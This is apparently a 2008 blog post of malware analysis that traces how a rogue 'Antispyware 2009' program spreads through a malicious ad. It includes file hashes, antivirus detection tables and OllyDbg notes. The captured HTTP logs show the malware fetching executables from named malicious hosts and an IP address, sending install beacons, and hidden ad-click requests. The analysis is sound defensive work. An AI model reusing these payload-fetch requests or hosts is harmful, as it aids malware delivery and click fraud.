Rogue Antispyware 2009 served through beedly.us ADS

Today, when I was browsing the beedly.us website, I saw a suspicious ADS link where there was a link to the malicious website proantispyware2009(dot)com, so I started to analyze the link and, below, there is the result:

Screenshot

So after clicking on the ADS I was redirected to a new sub-domain:

Screenshot

and if we view the HTML code is possible to see that if we click in the remove button we will be prompted to download a file named setup_246_3777_.exe that is the real setup file of the rogue security software.

Report Generated 13.11.2008 at 20.33.51 (GMT 1)
Filename: setup_246_3777_.exe
File size: 112 KB
MD5 Hash: E9339F9045368947789EC70739DE4B21
SHA1 Hash: DC7B37C1158F5AD4D3E092AFCADE58A5E3FC145B
Application Type: Executable (EXE) 32bit
Detection Rate: 0 on 23

After I executed the .EXE file we started to get some new traffic:

Screenshot

1
2
3
4
5
6
7
GET /get/?type=scanner&pin=246&lnd=3777 HTTP/1.1
User-Agent: Installer
Host: dl.storage-antispyware.com
 
HTTP/1.1 200 OK
Content-Disposition: attachment; filename=scanner_246_3777_.exe
Content-Transfer-Encoding: binary

From this traffic we can see that a new file is downloaded:

1
filename=scanner_246_3777_.exe

It is the installer for the rogue security software Antispyware 2009!

Report Generated 13.11.2008 at 21.24.07 (GMT 1)
Filename: scanner_246_3777_.exe
File size: 811 KB
MD5 Hash: E0F855C6C5FC93F0A8ED1FE9E702E492
SHA1 Hash: 77ACC5822A5EBD734075BDF4752EC6F10617050F
Detection Rate: 9 on 23

Antivirus Result
a-squared Trojan.Fakealert.ads.1!IK
Avira AntiVir TR/Fakealert.ads.1
Avast Win32:Spyware-gen [Trj] (0)
AVG Trojan horse SHeur.CQDP
BitDefender Trojan.FakeAlert.AKQ
ClamAV –
Comodo –
Dr.Web –
Ewido –
F-PROT 6 –
G DATA Win32:Spyware-gen [Trj] B
IkarusT3 Trojan.Fakealert.ads.1
Kaspersky –
McAfee PWCrack-Winspy trojan
NOD32 v3 –
Norman Aggressive commersial W32/AntiVirus2008.TB ()
Panda –
QuickHeal –
Solo Antivirus –
Sophos –
TrendMicro –
VBA32 –
VirusBuster –

Next, a new .EXE is downloaded and executed in my system:

1
2
3
4
5
6
7
GET /mxlivemedia/get_file.php HTTP/1.1
User-Agent: Installer
Host: 85.92.157.141
 
GET /mxlivemedia/multi/16.exe HTTP/1.1
User-Agent: Installer
Host: 85.92.157.141

and the file is:

1
Location: multi/16.exe

Report Generated 13.11.2008 at 20.39.42 (GMT 1)
Filename: 16.exe
File size: 598 KB
MD5 Hash: 9A785CF7901E348C1840925EB5E0C5CC
SHA1 Hash: 189EEA8FB44360C5E4011BB471D7F1D8F7B3F7AC
Detection Rate: 2 on 23

Antivirus Result
a-squared –
Avira AntiVir –
Avast –
AVG –
BitDefender Generic.Adw.Rotator.FF995C71
ClamAV –
Comodo –
Dr.Web –
Ewido –
F-PROT 6 –
G DATA –
IkarusT3 –
Kaspersky Trojan-Clicker.Win32.Agent.evi
McAfee –
NOD32 v3 –
Norman –
Panda –
QuickHeal –
Solo Antivirus –
Sophos –
TrendMicro –
VBA32 –
VirusBuster –

After 16.exe is executed we started to get new traffic from new hosts:

1
2
3
4
5
6
7
8
9
10
GET /stat.php?func=install&pid=246&ip=127.0.0.1&landing=3777
Host: int.vbvyu.com
 
GET /smb/nsi_install.php?inst_result=success&hwid=xxx
Host: a2.mxlivemedia.com
User-Agent: NSISDL/1.2 (Mozilla)
 
GET /bc/nsi_install.php?aff_id=mxlivemedia&inst_result=success&id=xxx
Host: a1.mxlivemedia.com
User-Agent: NSISDL/1.2 (Mozilla)

and after, IEXPLORE.EXE was executed hidden and the malware started to clickjack the ADS Links hidden!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
GET /servlet/ajrotator/246392/0/vh?z=icm&dim=186262
Referer: http://a1.mxlivemedia.com/bc/ads/728x90/48dcc730ea0ce.html
Host: rotator.its.adjuggler.com
 
GET /servlet/ajrotator/7678/0/vh?z=ast&ch=7108&dim=56
Referer: http://a1.mxlivemedia.com/bc/ads/728x90/48e220b3afd5f.html
Host: servedby.topqualityads.net
 
GET /bc/ads/300x250/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com
 
GET /bc/ads/160x600/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com
 
GET /bc/ads/728x90/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
 
GET /bc/ads/728x90/48dcc730ea0ce.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com
 
POST /bc/123kah.php
Host: a1.mxlivemedia.com

After, new files was created in system32:

Screenshot

Report Generated 13.11.2008 at 20.50.00 (GMT 1)
Filename: msclgkhvhfp.dll
File size: 173 KB
MD5 Hash: 8532E92178E9126A151E31683D896C31
SHA1 Hash: 088E2728D8D7D5E185AF231F54D917605F7CED24
Detection Rate: 6 on 23

Antivirus Result
a-squared Generic.Adw.Rotator!IK
Avira AntiVir –
Avast –
AVG –
BitDefender Generic.Adw.Rotator.FF995C71
ClamAV –
Comodo –
Dr.Web –
Ewido –
F-PROT 6 –
G DATA Trojan-Clicker.Win32.Agent.evi A
IkarusT3 Generic.Adw.Rotator
Kaspersky Trojan-Clicker.Win32.Agent.evi
McAfee AdClicker-GI trojan
NOD32 v3 –
Norman –
Panda –
QuickHeal –
Solo Antivirus –
Sophos –
TrendMicro –
VBA32 –
VirusBuster –

Below there are the IEXPLORE.EXE connections:

Screenshot

And finally appeared the image of the rogue security software Antispyware 2009 in the screen:

Screenshot

I have created a small summary of the activity of what happened during this analysis:

Screenshot

And after reading the article of SophosLabs that steve has posted in the comments, I have analyzed with OllyDbg the file setup_246_3777_.exe and below there are some images:

Original Entry Point:

Screenshot

Now, if I follow the address CALL 0040116D, I arrive at the code shown in the image below:

Screenshot

And now, If I follow the address MOV EDX,00405DEC, I arrive at the code shown in image below, that is full of zero bytes (similar to the analysis of SophosLabs):

Screenshot

And for finish, below, I have added some images of the fake alerts shown by Pro Antispyware 2009:

Fake alert

Make sure to not fall in this scam, if your computer is infected with Antispyware 2009, it is recommended to remove it immediately and to scan your system with NoVirusThanks Malware Remover.

Random Posts

Previous Posts